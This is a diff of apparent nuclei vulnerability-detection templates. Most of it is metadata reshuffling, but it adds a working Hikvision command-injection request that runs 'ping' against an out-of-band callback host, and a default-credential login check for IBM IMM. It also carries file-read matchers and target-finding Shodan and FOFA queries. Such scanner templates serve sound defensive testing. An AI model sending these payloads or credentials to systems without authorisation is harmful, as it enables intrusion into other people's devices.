     - https://support.posit.co/hc/en-us/articles/10983374992023-CVE-2022-38131-configuration-issue-in-Posit-Connect
     - https://github.com/JoshuaMart/JoshuaMart
+  impact: |
+    An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
+  remediation: |
+    This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2022-38131
     cwe-id: CWE-601
+    cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
     epss-score: 0.0006
     epss-percentile: 0.23591
-    cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
   metadata:
+    product: connect
+    shodan-query: "http.favicon.hash:217119619"
+    fofa-query: "app=\"RStudio-Connect\""
+    max-request: 1
     verified: true
     vendor: rstudio
-    product: connect
-    shodan-query: http.favicon.hash:217119619
-    fofa-query: app="RStudio-Connect"
   tags: tenable,cve,cve2022,redirect,rstudio
 
 http:
@@ -46,4 +47,4 @@ http:
       - type: status
         status:
           - 307
-# digest: 4a0a00473045022100e9632f43574d44779bc09a10a78cb6835cc4b0179a707b395efecda59dcb8b5402205a72129b99d873d786c6aa9062e142a0b02192b31aa930c1a234a6d61558b479:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100aed598584561fa1188599f4a3fa2ff5ae9149e94b624fef3be306a7a74429c3f02201c02b4ebc6bfa15076a56527dc53df6e0be1e5d7f890dbc1558b26e30d35059b:922c64590222798bb761d5b6d8e72950

http/cves/2022/CVE-2022-4140.yaml

@@ -18,8 +18,8 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2022-4140
     cwe-id: CWE-552
-    epss-score: 0.01317
+    epss-score: 0.00932
-    epss-percentile: 0.84504
+    epss-percentile: 0.82572
     cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
   metadata:
     verified: true
@@ -54,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c309f56d1bc6b8b3ad4aeedfea6624e9072d042193f145856563965410ce9e7c022100cc3f6acff92ea09cb461e67964a2e5973fbb82fdd391e5176e287a0be8c759c1:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402200691e9b2e104e67432ef4041648aca88eaa5a1fc58bbc764da8a0cf8240733da022015c0a0d07bcd6552d8c77f685c7c9bc595e3e7e9f3d8bf9b201968fcd4af75b4:922c64590222798bb761d5b6d8e72950

http/cves/2023/CVE-2023-0552.yaml

@@ -17,7 +17,7 @@ info:
     cve-id: CVE-2023-0552
     cwe-id: CWE-601
     epss-score: 0.00086
-    epss-percentile: 0.35637
+    epss-percentile: 0.34914
     cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
   metadata:
     verified: true
@@ -38,4 +38,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
-# digest: 4a0a004730450221008eccfd0ecd7398b3566c5cfec47a5d3396899495831dabbee13a144918b2127e0220232a7e35aba58e28f2c38ac75f7f4558d7419e63c82e7b145dba6569f3e52fcf:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402201ab8dcd9693d8e9c7b7e3c2ac162de7610f21d7c3523e623a005ecdeababa57902203039fe388db8f4aef6c49c40a2cff545792484a6dda13261675b612810c874f9:922c64590222798bb761d5b6d8e72950

http/cves/2023/CVE-2023-26255.yaml

@@ -22,7 +22,7 @@ info:
     cve-id: CVE-2023-26255
     cwe-id: CWE-22
     epss-score: 0.15138
-    epss-percentile: 0.95348
+    epss-percentile: 0.95663
     cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:*
   metadata:
     max-request: 1
@@ -52,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203d3f6c5452e186ee057389d3819be8e0fb41db7582a366b90ee39072f3c7d77f022100a9a161043ec3d29f43d105a2fd562bb509c5f7b85392ff6516cb29dde828f5b9:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450221009eff1cfcd9afb5c04d7b263baaf2ff4faf43631d4e6eaf033ca3c6b8fd85de5d022060065320c9d8eac58e06f71ddabfeaecb433875fa230c89a4015e129415c44f3:922c64590222798bb761d5b6d8e72950

http/cves/2023/CVE-2023-28662.yaml

@@ -6,28 +6,29 @@ info:
   severity: critical
   description: |
     The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.
-  impact: |
-    Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
-  remediation: |
-    Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
   reference:
     - https://www.tenable.com/security/research/tra-2023-2
     - https://wordpress.org/plugins/gift-voucher/
     - https://github.com/ARPSyndicate/cvemon
     - https://github.com/JoshuaMart/JoshuaMart
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
+  remediation: |
+    Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2023-28662
     cwe-id: CWE-89
+    cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
     epss-score: 0.00076
     epss-percentile: 0.31593
-    cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
   metadata:
     vendor: codemenschen
-    product: gift_vouchers
+    product: "gift_vouchers"
     framework: wordpress
-    fofa-query: body="/wp-content/plugins/gift-voucher/"
+    fofa-query: "body=\"/wp-content/plugins/gift-voucher/\""
+    max-request: 2
   tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher
 
 flow: http(1) && http(2)
@@ -59,4 +60,4 @@ http:
           - status_code == 500
           - contains(body, 'critical error')
         condition: and
-# digest: 490a00463044022009c58d25fec3c30e1ad3887484383645315f8e71fe821a509bf323cff77eb615022072f0bfae8790782eb15f69313e0ba60c76e9b1431b1bd18cf6842ca56ad685a9:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100897f4b8dcfa22ad10a9b4881331ba0166610d2d1f177506cf60e47094c3bfbea022100b256673611bdf13504dc6bf1875ba960441fb7f9bb60ec748474e98d2c76d3fc:922c64590222798bb761d5b6d8e72950

http/cves/2023/CVE-2023-32563.yaml

@@ -13,13 +13,14 @@ info:
     - https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939
     - https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US
     - https://nvd.nist.gov/vuln/detail/CVE-2023-32563
+    - https://github.com/mayur-esh/vuln-liners
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2023-32563
     cwe-id: CWE-22
-    epss-score: 0.43261
+    epss-score: 0.42647
-    epss-percentile: 0.97013
+    epss-percentile: 0.97218
     cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:*
   metadata:
     max-request: 2
@@ -56,4 +57,4 @@ http:
         part: body_2
         words:
           - "CVE-2023-32563"
-# digest: 4b0a0048304602210095f0377361174bf0f18bb6b480904a01bad012dd184abcf963d328e084a7cf45022100aa4c0a0aad45a19e6fb8fd3dc956cc89ac088f8ed744c630eb9b9cd5d1ad38ee:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220277c51026fc6ee497604b9edf835b895ebb5f041702564b51386e1aff926cdd502206a64318799d865c7590bca991daf364669b8257fa8d74439d3aada9f801eb608:922c64590222798bb761d5b6d8e72950

http/cves/2023/CVE-2023-42344.yaml

@@ -6,14 +6,14 @@ info:
   severity: high
   description: |
     users can execute code without authentication.  An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
-  remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
   reference:
     - https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
     - https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
+  remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
   metadata:
-    verified: true
+    max-request: 2
-    max-request: 1
     fofa-query: "OpenCms-9.5.3"
+    verified: true
   tags: cve,cve2023,xxe,opencms
 
 http:
@@ -36,4 +36,4 @@ http:
           - "root:.*:0:0:"
           - "invalidArgument"
         condition: and
-# digest: 4a0a00473045022100927a1bd7a3c4f8af7b6989155be518f1259a6cdd15ba59dad7785280d7c5ec9702203e99452c03ab5e09e1ef1627473fb5a1ebe79a654ad369b1e2190145c98e9b32:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502207dccf8dee9a6e05f16f56533d13329cf5bb1cac34d72692fef62fd33077527e20221009e14b0264ffda37db9a79c357a04a6512985d7c64cc6157addf5246d2ec24d1e:922c64590222798bb761d5b6d8e72950

http/cves/2023/CVE-2023-46805.yaml

@@ -16,8 +16,9 @@ info:
     cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
   metadata:
     vendor: ivanti
-    product: connect_secure
+    product: "connect_secure"
-    shodan-query: html:"welcome.cgi?p=logo"
+    shodan-query: "html:\"welcome.cgi?p=logo\""
+    max-request: 2
   tags: cve,cve2023,kev,auth-bypass,ivanti
 
 http:
@@ -48,4 +49,4 @@ http:
           - 'contains(body_2, "block_message")'
           - 'contains(header_2, "application/json")'
         condition: and
-# digest: 490a0046304402204614c79e65441e3043a41452c64e73db844daaec0a04ff4ec5d9999c51825f83022077d76a1a7ab3b0ab8fb364824bfe94bcf6ad07ef3fc21736ac56399d12397a58:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402204ad3fa1c2d287f2d56aad453123f1b51f179ee3f12ab4a01a78e376c8d3de46b022044b7912e398ea01a9fb5d948d162710fb8ece66b2fc48b8a9c82b38568a12c03:922c64590222798bb761d5b6d8e72950

http/cves/2023/CVE-2023-52085.yaml

@@ -14,14 +14,15 @@ info:
     cvss-score: 5.4
     cve-id: CVE-2023-52085
     cwe-id: CWE-22
+    cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
     epss-score: 0.00046
     epss-percentile: 0.12483
-    cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
   metadata:
     vendor: wintercms
     product: winter
-    shodan-query: title:"Winter CMS"
+    shodan-query: "title:\"Winter CMS\""
-    fofa-query: title="Winter CMS"
+    fofa-query: "title=\"Winter CMS\""
+    max-request: 4
   tags: cve,cve2023,authenticated,lfi,wintercms
 
 http:
@@ -68,4 +69,4 @@ http:
         regex:
           - '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
         internal: true
-# digest: 490a0046304402205dc4e3489b8db4f6e587d569813f9eec4372432d2ed1350de8d8bc00c7d01a8d02207363f5db9a634f3a0973e7e364948a39da565ec0b5ea0f3ac1276c0fc7027331:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100edda67cd80bdd516aa4f6241fa72a9e1d6c1e240eb1d40d35ae9c44143ff025902206f496f8d850ad284d589527d8abd90bf13aa0414c007dad56d79ba9c57d33c59:922c64590222798bb761d5b6d8e72950

http/cves/2023/CVE-2023-6831.yaml

@@ -6,25 +6,26 @@ info:
   severity: high
   description: |
     Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
-  remediation: |
-    Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-6831
     - https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
     - https://huntr.com/bounties/0acdd745-0167-4912-9d5c-02035fe5b314
+  remediation: |
+    Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
     cvss-score: 8.1
     cve-id: CVE-2023-6831
     cwe-id: CWE-22
-    epss-score: 0.000460000
-    epss-percentile: 0.126930000
     cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
+    epss-score: 0.00046
+    epss-percentile: 0.12693
   metadata:
-    verified: true
     vendor: lfprojects
     product: mlflow
-    shodan-query: http.title:"mlflow"
+    shodan-query: "http.title:\"mlflow\""
+    max-request: 2
+    verified: true
   tags: cve,cve2023,mlflow,pathtraversal,lfprojects
 
 http:
@@ -58,4 +59,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 490a0046304402202e05b1ca433f0cc3ad8178fa3db634d613c180a5d76bd1907daf5a29b102f02f0220546c974febbb5121e3697cfc1e76620c450e31cee055c94cd0b25375648e38ba:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022032f829866528954cdb8ce1c5298787430b08b1d4550ab556b77f078e362da3e102207691a8b5b4639a9faf128176e590b98fc0841775bb6df00b97a7253772fe498a:922c64590222798bb761d5b6d8e72950

http/cves/2023/CVE-2023-6895.yaml

@@ -0,0 +1,56 @@
+id: CVE-2023-6895
+
+info:
+  name: Hikvision Intercom Broadcasting System - Command Execution
+  author: archer
+  severity: critical
+  description: |
+    Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
+  reference:
+    - https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
+    - https://vuldb.com/?ctiid.248254
+    - https://vuldb.com/?id.248254
+    - https://github.com/Marco-zcl/POC
+    - https://github.com/d4n-sec/d4n-sec.github.io
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-6895
+    cwe-id: CWE-78
+    epss-score: 0.0008
+    epss-percentile: 0.32716
+    cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: hikvision
+    product: intercom_broadcast_system
+    fofa-query: icon_hash="-1830859634"
+  tags: cve,cve2023,rce,hikvision
+
+http:
+  - raw:
+      - |
+        POST /php/ping.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-Requested-With: XMLHttpRequest
+
+        jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - "TTL="
+
+      - type: status
+        status:
+          - 200
+# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950

http/cves/2023/CVE-2023-6909.yaml

@@ -6,24 +6,25 @@ info:
   severity: critical
   description: |
     Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
-  impact: |
-    Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
-  remediation: |
-    To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
   reference:
     - https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/
     - https://nvd.nist.gov/vuln/detail/CVE-2023-6909
     - https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
+  impact: |
+    Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
+  remediation: |
+    To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
     cvss-score: 9.3
     cve-id: CVE-2023-6909
     cwe-id: CWE-29
   metadata:
+    max-request: 5
     verified: true
     vendor: lfprojects
     product: mlflow
-    shodan-query: http.title:"mlflow"
+    shodan-query: "http.title:\"mlflow\""
   tags: cve,cve2023,mlflow,lfi
 
 http:
@@ -90,4 +91,4 @@ http:
         json:
           - '.run.info.run_id'
         internal: true
-# digest: 4a0a00473045022057cab29fe3d00006c6db44ac420a34cecdad60ef71ae6159d9d1870d61d97420022100cd6d7114a977b54c1190e1a9a7002626d05b41874dccf1e9e5d38cacc7082c6d:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100dc4c33652fcf1a1d0dc29690ac81838de82d0c439cc405cb3b0296d4e10cb855022100b3a49f754395ee217ea12cc561be556cc6c3a8da3facee851d5f37fdbab72d61:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-0713.yaml

@@ -15,14 +15,15 @@ info:
     cvss-score: 8.8
     cve-id: CVE-2024-0713
     cwe-id: CWE-434
+    cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
     epss-score: 0.00061
     epss-percentile: 0.2356
-    cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
   metadata:
     vendor: monitorr
     product: monitorr
     verified: true
-    fofa-query: icon_hash="-211006074"
+    fofa-query: "icon_hash=\"-211006074\""
+    max-request: 2
   tags: cve,cve2024,file-upload,intrusive,monitorr
 
 variables:
@@ -66,4 +67,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502200e99cf7ecbba3a0c88653fc454cb5715d7085e0678ab470e4b7cfbf4dd198e8d022100e47a621b93eaabb8881e48cae80b9cc8c0596a437fc9b8ac0921a63beee74506:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402201b9bb4536c3d56e915516c2b0156629ce6f3689a312eddd8d0694b86aa144e1902203d8dccbcbba044b30e6fff72ceb7f66bf40a9bf6f3130c3f3b11b0ec3c30a863:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-1021.yaml

@@ -6,17 +6,17 @@ info:
   severity: medium
   description: |
     There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
+  reference:
+    - https://github.com/getrebuild/rebuild
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-1021
   impact: |
     Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
   remediation: |
     Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
-  reference:
-    - https://github.com/getrebuild/rebuild
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-1021
   metadata:
-    max-request: 1
+    max-request: 2
     verified: true
-    fofa-query: icon_hash="871154672"
+    fofa-query: "icon_hash=\"871154672\""
   tags: cve2024,cve,rebuild,ssrf
 
 http:
@@ -32,4 +32,4 @@ http:
           - '!contains(body_1, "<h1> Interactsh Server </h1>")'
           - 'status_code_2 == 200'
         condition: and
-# digest: 4a0a004730450220098225bea96b8668687e7dfe13e7567202130b05bf6e23cffcc70cb83386d700022100f078d24ac95ac54515557e84e1bc60404c9d6d59cfa0604f82e5d03baaf841e6:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220491492872c6924a820f6183de45c341dbc8838eec5bd79f241a7a8e007817a4d022100bcf486a787a7ac18c43f5a856e8edf8c68546b59012e7c096bbc48085b3ce175:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-1061.yaml

@@ -6,14 +6,14 @@ info:
   severity: high
   description: |
     WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
-  impact: |
-    Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
-  remediation: |
-    Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
   reference:
     - https://www.tenable.com/security/research/tra-2024-02
     - https://wordpress.org/plugins/html5-video-player
     - https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
+  remediation: |
+    Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
     cvss-score: 8.6
@@ -21,7 +21,8 @@ info:
     cwe-id: CWE-89
   metadata:
     verified: true
-    fofa-query: '"wordpress" && body="html5-video-player"'
+    fofa-query: "\"wordpress\" && body=\"html5-video-player\""
+    max-request: 1
   tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player
 
 http:
@@ -36,4 +37,4 @@ http:
           - 'contains(header, "application/json")'
           - 'contains_all(body, "created_at", "video_id")'
         condition: and
-# digest: 4b0a0048304602210082f5c18e0ac8422e532f5581f775dfd9a57d7c059cf6f41622d7a00306bfa3c6022100d0500ab738261efc3de306be7f8149c4a2f98b4c1560c26fe3617520ce9dd6e9:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100fa33c5d3e6fdd93832d18b7feaeceaab7dc13294ca6117b62c0cf322a734e7d3022100bec7347a690ebaf2785ae5b325485392dbdb16005fd15b862aca9a8930646034:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-21645.yaml

@@ -6,25 +6,26 @@ info:
   severity: medium
   description: |
     A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.
-  impact: |
-    Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
   reference:
     - https://github.com/advisories/GHSA-ghmw-rwh8-6qmr
     - https://nvd.nist.gov/vuln/detail/CVE-2024-21645
     - https://github.com/fkie-cad/nvd-json-data-feeds
+  impact: |
+    Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
     cvss-score: 5.3
     cve-id: CVE-2024-21645
     cwe-id: CWE-74
+    cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
     epss-score: 0.00046
     epss-percentile: 0.13723
-    cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
   metadata:
     verified: true
     vendor: pyload
     product: pyload
-    shodan-query: title:"pyload"
+    shodan-query: "title:\"pyload\""
+    max-request: 2
   tags: cve,cve2024,pyload,authenticated,injection
 
 variables:
@@ -59,4 +60,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e4681bad6b75b2295f0256953d1d293a42d79e61b3607a307caf6cc5b040ccbb02201912657be888fe3a799ada24aaa1de05d3667731e84900bedb0e556a187f2dfc:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402203cbf3ae7a02a2a68165345f0bd855eb6ab923669c8d2aa78f2922e0baee747f702201104ac76e942d9f3bff9d59b6e4227e4d59ff27e41aeca67e1138508b572d5b9:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-21893.yaml

@@ -18,8 +18,9 @@ info:
     cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
   metadata:
     vendor: ivanti
-    product: connect_secure
+    product: "connect_secure"
     shodan-query: "html:\"welcome.cgi?p=logo\""
+    max-request: 1
   tags: cve,cve2024,kev,ssrf,ivanti
 
 http:
@@ -43,4 +44,4 @@ http:
           - '/dana-na/'
           - 'WriteCSS'
         condition: and
-# digest: 4a0a00473045022100fefc6637185b28b4af8b503bdb7b89401fc591c34cb6082b20322ac0f1ad67c8022027e634cbc733ad699766de6d8eb8f22b6368d0b663cd28cbd957eaaf37f51838:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022031bba2e0349c9af3102196e00e85678ddbb51ba287e5d624558a50a3bbaa6be20221008a362ec4ef64ece7ab22636b902c72df49e1f72c519731e5c2eb22dec2db5c76:922c64590222798bb761d5b6d8e72950

http/default-logins/ibm/ibm-dcbc-default-login.yaml

@@ -8,7 +8,8 @@ info:
     - https://www.ibm.com/docs/en/odm/8.0.1?topic=users-tutorial-getting-started-decision-center-business-console
   metadata:
     verified: true
-    shodan-query: title="Decision Center | Business Console"
+    shodan-query: "title=\"Decision Center | Business Console\""
+    max-request: 1
   tags: ibm,default-login,decision-center
 
 http:
@@ -42,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502205523a863445a05acb27e5d7ae6cb824465b467afcd5bf3f7f916c78ff4853b54022100f6e82a4f9f222831b97dcb7bf5d0a3410048123eface5f0840f9571b5c31ac2d:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022016a80ca652cc1c45b3f6d4c92fce061f9fc9d9cb8d9cfe96626d34be23038086022100bc041f5982bff0cd5c6c76e96a375e3be9dcfdd433a205870a938cc378c23418:922c64590222798bb761d5b6d8e72950

http/default-logins/ibm/ibm-dcec-default-login.yaml

@@ -8,7 +8,8 @@ info:
     - https://www.ibm.com/docs/en/odm/8.5.1?topic=console-tutorial-getting-started-decision-center-enterprise
   metadata:
     verified: true
-    shodan-query: html="Decision Center Enterprise console"
+    shodan-query: "html=\"Decision Center Enterprise console\""
+    max-request: 1
   tags: ibm,default-login,decision-center
 
 http:
@@ -42,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f49bccdf778836b24be61c1c569daa47361ed0b8f9f3b1832055b5bc2a007f1502206ce043ef3f1813f97d2ff4376fadf94112238eed01bfb77c3d404179a8b760b4:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100eda449ebab75e6434f62e1e6ad214e7a3a4cbc01f47209e6f2367427fc73892f02202b8e060110bc0d3aed5fc0e773daa6416705f332e863b1f851a004b1364615be:922c64590222798bb761d5b6d8e72950

http/default-logins/ibm/ibm-dsc-default-login.yaml

@@ -8,7 +8,8 @@ info:
     - https://www.ibm.com/docs/en/odm/8.8.0?topic=center-overview-decision
   metadata:
     verified: true
-    shodan-query: title:"Rule Execution Server"
+    shodan-query: "title:\"Rule Execution Server\""
+    max-request: 1
   tags: ibm,default-login,decision-server
 
 http:
@@ -43,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e2da7214e13a57c4441de262e1f4377d8decac405644528c512f6298514f47ac022100f1ac476ef1244aed60da4511ef21547cb5d7cbd6238124f45f040fadc6796b39:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220196e8fb1a9ddef98855c38f2719f3c5405d7c51e90772f82c6d35c0d7596cc06022100cc5faf04711e248eb7c4c8b2fd597c8346977de7602568861691790ec7a56b1b:922c64590222798bb761d5b6d8e72950

http/default-logins/ibm/imm-default-login.yaml

@@ -0,0 +1,44 @@
+id: imm-default-login
+
+info:
+  name: Integrated Management Module - Default Login
+  author: jpg0mez
+  severity: high
+  description: |
+    Integrated Management Module default login credentials were discovered.
+  reference:
+    - https://pubs.lenovo.com/x3650-m4/t_logging_web_interface
+    - https://www.ibm.com/docs/en/tcs-service?topic=oip-logging-imm-web-interface
+  classification:
+    cwe-id: CWE-798
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: "integrated management module"
+    shodan-query: html:"ibmdojo"
+  tags: imm,ibm,default-login
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/data/login"
+    body: "user=USERID&password=PASSW0RD"
+
+    redirects: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<authResult>0</authResult>"
+          - 'authResult":"0'
+        condition: or
+
+      - type: word
+        words:
+          - "index-console.php"
+          - "home.php"
+        condition: and
+
+      - type: status
+        status:
+          - 200

http/default-logins/webmethod/webmethod-integration-default-login.yaml

@@ -7,8 +7,9 @@ info:
   reference:
     - https://documentation.softwareag.com/
   metadata:
+    shodan-query: "http.favicon.hash:-234335289"
+    max-request: 5
     verified: true
-    shodan-query: http.favicon.hash:-234335289
   tags: default-login,webmethod
 
 flow: http(1) && http(2)
@@ -63,4 +64,4 @@ http:
           - Invalid credentials
         negative: true
         condition: and
-# digest: 4a0a00473045022100c2ff9832495b567326f60a3290cab01226778deef5fb3b3cc77288024507dce7022035ca48f6387403fbaccecdec948c4473ce0e90f135fc8b17cc5c3c28c8d54d70:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220115d89c488b0862bb1273fe0b0298087afa5b74b011991ae1cebba5921795590022100a3bbc39dba847eadccd27ed89d597a41e3a4508393fae04c9c017f35f0b9db36:922c64590222798bb761d5b6d8e72950

http/exposed-panels/cisco-unity-panel.yaml

@@ -0,0 +1,37 @@
+id: cisco-unity-panel
+
+info:
+  name: Cisco Unity Connection Panel - Detect
+  author: HeeresS
+  severity: info
+  description: |
+    A Cisco Unity Connection instance was detected.
+  metadata:
+    shodan-query: "html:\"Cisco Unity Connection\""
+    max-request: 2
+    verified: true
+  tags: panel,cisco,unity,login,detect
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cuadmin/home.do"
+      - "{{BaseURL}}"
+
